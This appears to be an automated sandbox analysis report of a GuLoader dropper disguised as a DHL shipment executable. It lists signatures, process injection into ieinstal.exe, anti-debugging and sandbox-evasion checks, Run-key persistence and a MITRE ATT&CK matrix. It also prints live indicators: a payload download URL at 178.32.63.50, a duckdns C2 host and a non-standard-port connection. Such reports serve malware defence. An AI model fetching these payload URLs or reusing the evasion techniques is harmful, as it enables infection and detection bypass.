Play interactive tour

Edit tour

Windows Analysis Report DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Overview

General Information

Sample Name:	DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
Analysis ID:	1360
MD5:	8e2b177d2ab29c95f067559a029cf5e8
SHA1:	f347fa229d51836344ab5bf89fa531e19aa5e324
SHA256:	b9fdde7d748e27a130c509a589a2c8b92aad279604d3e4ee7ac28187fc5660be
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Potential malicious icon found

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Yara detected GuLoader

Hides threads from debuggers

Writes to foreign memory regions

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses dynamic DNS services

Uses 32bit PE files

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Contains functionality to execute programs as a different user

Sleep loop found (likely to delay execution)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to call native functions

Contains functionality for execution timing, often used to detect debuggers

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe (PID: 872 cmdline: 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe' MD5: 8E2B177D2AB29C95F067559A029CF5E8)

ieinstal.exe (PID: 7104 cmdline: 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe' MD5: 7871873BABCEA94FBA13900B561C7C55)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Virustotal: Detection: 31%			Perma Link
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	ReversingLabs: Detection: 17%

Antivirus / Scanner detection for submitted sample

Show sources

Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Avira: detected

Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49806 -> 178.32.63.50:80

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: septnet.duckdns.org

Source: Joe Sandbox View	ASN Name: TELIANETTeliaCarrierEU TELIANETTeliaCarrierEU
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: global traffic

HTTP traffic detected: GET /moss/Host_AKhLBP62.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache

Source: global traffic

TCP traffic: 192.168.11.20:49807 -> 193.104.197.28:6577

Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50

Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp	String found in binary or memory: http://178.32.63.50/boss/Host_AKhLBP62.bin
Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp	String found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.bin
Source: ieinstal.exe, 00000006.00000002.318237025480.0000000003229000.00000004.00000020.sdmp	String found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.bin:
Source: ieinstal.exe, 00000006.00000002.318237025480.0000000003229000.00000004.00000020.sdmp	String found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.binF
Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp	String found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.binhttp://178.32.63.50/boss/Host_AKhLBP62.binwininet.dllMozil

Source: unknown

DNS traffic detected: queries for: septnet.duckdns.org

Source: global traffic

HTTP traffic detected: GET /moss/Host_AKhLBP62.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_00403DD6	2_2_00403DD6
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_0040415B	2_2_0040415B
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_023018E5	2_2_023018E5
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_0230C119	2_2_0230C119
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_0230E165	2_2_0230E165
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_0230303C	2_2_0230303C
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02304419	2_2_02304419
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02304245	2_2_02304245
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_023042B5	2_2_023042B5
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02304484	2_2_02304484
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_0230CED6	2_2_0230CED6
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_023036D9	2_2_023036D9
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_0230452C	2_2_0230452C
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02303700	2_2_02303700
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02304358	2_2_02304358
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02303BBC	2_2_02303BBC
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02303BBE	2_2_02303BBE
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02302F90	2_2_02302F90
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02304195	2_2_02304195
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02302F9B	2_2_02302F9B
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02304184	2_2_02304184

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_0230DC5F NtProtectVirtualMemory,	2_2_0230DC5F
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_0230C119 NtAllocateVirtualMemory,	2_2_0230C119
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02307B69 NtWriteVirtualMemory,	2_2_02307B69
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02307BAC NtWriteVirtualMemory,	2_2_02307BAC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030CED4E NtProtectVirtualMemory,	6_2_030CED4E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030CEC4F Sleep,NtProtectVirtualMemory,	6_2_030CEC4F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030CECBD Sleep,NtProtectVirtualMemory,	6_2_030CECBD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030CED49 NtProtectVirtualMemory,	6_2_030CED49
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030CED5C NtProtectVirtualMemory,NtProtectVirtualMemory,	6_2_030CED5C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030CEDB8 NtProtectVirtualMemory,	6_2_030CEDB8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030CEE3A NtProtectVirtualMemory,	6_2_030CEE3A

Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313749031092.0000000000419000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameVOLDFRELSERS.exe vs DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Binary or memory string: OriginalFilenameVOLDFRELSERS.exe vs DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Virustotal: Detection: 31%
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	ReversingLabs: Detection: 17%

Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'	Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

File created: C:\Users\user\AppData\Local\Temp\LABERT

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@3/1@1/2

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Mutant created: \Sessions\1\BaseNamedObjects\oILYSlqV

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_00409455 push es; iretd	2_2_00409456
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_00407E31 push ds; retf	2_2_00407E32
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_004072C1 push edx; retf	2_2_004072C2
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_00406294 push edx; retf	2_2_00406297
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_00406D73 push es; retf	2_2_00406D76
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_004099EF push esp; iretd	2_2_004099F2
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_00407BFF push FFFFFFA7h; iretd	2_2_00407C53
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02300390 push BDC367A8h; ret	2_2_02300383
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02307F80 push FFFFFFAFh; ret	2_2_02307F93
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02304F84 push esi; iretd	2_2_02304F87

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Halvngen7			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Halvngen7			Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEUSER32PSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\CIRKUSFORESTILLINGER.EXE\LABERTSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNHALVNGEN7HTTP://178.32.63.50/MOSS/HOST_AKHLBP62.BINHTTP://178.32.63.50/BOSS/HOST_AKHLBP62.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEUSER32PSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=PROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\MSVBVM60.DLL
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmp, ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 6880	Thread sleep count: 9976 > 30			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 6880	Thread sleep time: -49880s >= -30000s			Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Thread sleep count: Count: 9976 delay: -5

Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Code function: 2_2_02303B3F rdtsc

2_2_02303B3F

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Window / User API: threadDelayed 9976

Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

System information queried: ModuleInformation

Jump to behavior

Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeuser32psapi.dllMsi.dllPublishershell32advapi32TEMP=ProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\msvbvm60.dll
Source: ieinstal.exe, 00000006.00000002.318236722320.00000000031E8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeuser32psapi.dllMsi.dllPublishershell32advapi32TEMP=\Cirkusforestillinger.exe\LABERTSoftware\Microsoft\Windows\CurrentVersion\RunHalvngen7http://178.32.63.50/moss/Host_AKhLBP62.binhttp://178.32.63.50/boss/Host_AKhLBP62.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmp, ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Code function: 2_2_02303B3F rdtsc

2_2_02303B3F

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02305833 mov eax, dword ptr fs:[00000030h]	2_2_02305833
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_02305859 mov eax, dword ptr fs:[00000030h]	2_2_02305859
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_023088B5 mov eax, dword ptr fs:[00000030h]	2_2_023088B5
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_023058BF mov eax, dword ptr fs:[00000030h]	2_2_023058BF
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_0230CED6 mov eax, dword ptr fs:[00000030h]	2_2_0230CED6
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_0230599C mov eax, dword ptr fs:[00000030h]	2_2_0230599C
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Code function: 2_2_0230BDCB mov eax, dword ptr fs:[00000030h]	2_2_0230BDCB

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Code function: 2_2_02308A19 LdrInitializeThunk,

2_2_02308A19

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Code function: 2_2_0230E165 RtlAddVectoredExceptionHandler,

2_2_0230E165

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 30C0000

Jump to behavior

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Code function: 2_2_0230CED6 LoadLibraryA,LogonUserA,

2_2_0230CED6

Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'

Jump to behavior

Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation	Valid Accounts1	Valid Accounts1	Valid Accounts1	OS Credential Dumping	Security Software Discovery321	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Registry Run Keys / Startup Folder1	Access Token Manipulation1	Access Token Manipulation1	LSASS Memory	Virtualization/Sandbox Evasion23	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	DLL Side-Loading1	Process Injection112	Virtualization/Sandbox Evasion23	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Registry Run Keys / Startup Folder1	Process Injection112	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	DLL Side-Loading1	Obfuscated Files or Information1	LSA Secrets	System Information Discovery2	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol112	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	32%	Virustotal		Browse
